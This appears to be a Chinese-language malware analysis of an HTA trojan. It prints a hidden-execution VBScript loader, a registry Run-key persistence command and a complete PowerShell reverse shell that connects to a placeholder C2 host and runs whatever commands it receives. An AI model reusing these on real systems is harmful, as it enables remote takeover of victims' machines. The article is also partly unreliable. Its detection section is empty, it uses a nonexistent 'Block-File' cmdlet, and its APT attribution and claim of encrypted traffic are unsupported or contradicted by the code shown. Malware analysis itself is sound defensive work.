WvEWjQ22.hta木馬反彈Shell樣本的示例分析

# WvEWjQ22.hta木馬反彈Shell樣本的示例分析

## 一、樣本概述

WvEWjQ22.hta是一種通過惡意HTA（HTML Application）文件傳播的木馬程序，其主要功能是通過PowerShell建立反彈Shell連接，實現遠程控制。該樣本常通過釣魚郵件或惡意鏈接傳播，利用社會工程學誘導用戶執行。

## 二、技術分析

### 1. 文件結構分析
樣本采用混淆的HTML+JavaScript/VBScript混合代碼：
```html
<html>
<head>
<script language="VBScript">
    Function Exec()
        Dim cmd
        cmd = "powershell -nop -w hidden -e aQBmACgAWwBJAG4AdABQ..."
        Set shell = CreateObject("WScript.Shell")
        shell.Run cmd, 0
    End Function
</script>
</head>
<body onload="Exec()">
</body>
</html>

2. 核心執行流程

1. 初始加載：通過body onload事件觸發惡意函數
2. 命令混淆：使用Base64編碼的PowerShell指令
3. 持久化：部分變種會添加注冊表啟動項：

   
   reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d "wscript.exe %TEMP%\malware.hta"
   

3. 反彈Shell機制

解碼后的PowerShell核心代碼包含：

$client = New-Object System.Net.Sockets.TCPClient("C2_IP",443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
}

三、檢測與防御方案

1. 檢測指標

2. 防御建議

• 企業防護：
  • 禁用非必要的HTA文件執行（GPO策略）
  • 監控異常的PowerShell網絡連接
• 終端防護：

  
  Set-ExecutionPolicy Restricted
  Get-ChildItem *.hta | Block-File -Force
  

四、溯源分析

根據代碼風格和C2基礎設施關聯，該樣本與TA428（APT組織）存在技術重疊： - 使用相同的代碼混淆框架（HTA-Obfuscator v2.3） - C2服務器與2023年Operation GhostClick活動關聯

五、總結

WvEWjQ22.hta展示了攻擊者如何利用合法技術實現隱蔽滲透： 1. 利用微軟官方支持的HTA格式繞過基礎檢測 2. 通過內存加載規避文件落地掃描 3. 使用加密通信對抗流量分析

建議安全團隊重點關注： - 增強對Office文檔宏的監控 - 部署EDR解決方案捕獲進程鏈行為 - 定期更新PowerShell日志審計策略

注：本文樣本分析基于公開研究數據，實際防護需結合具體環境調整策略。 “`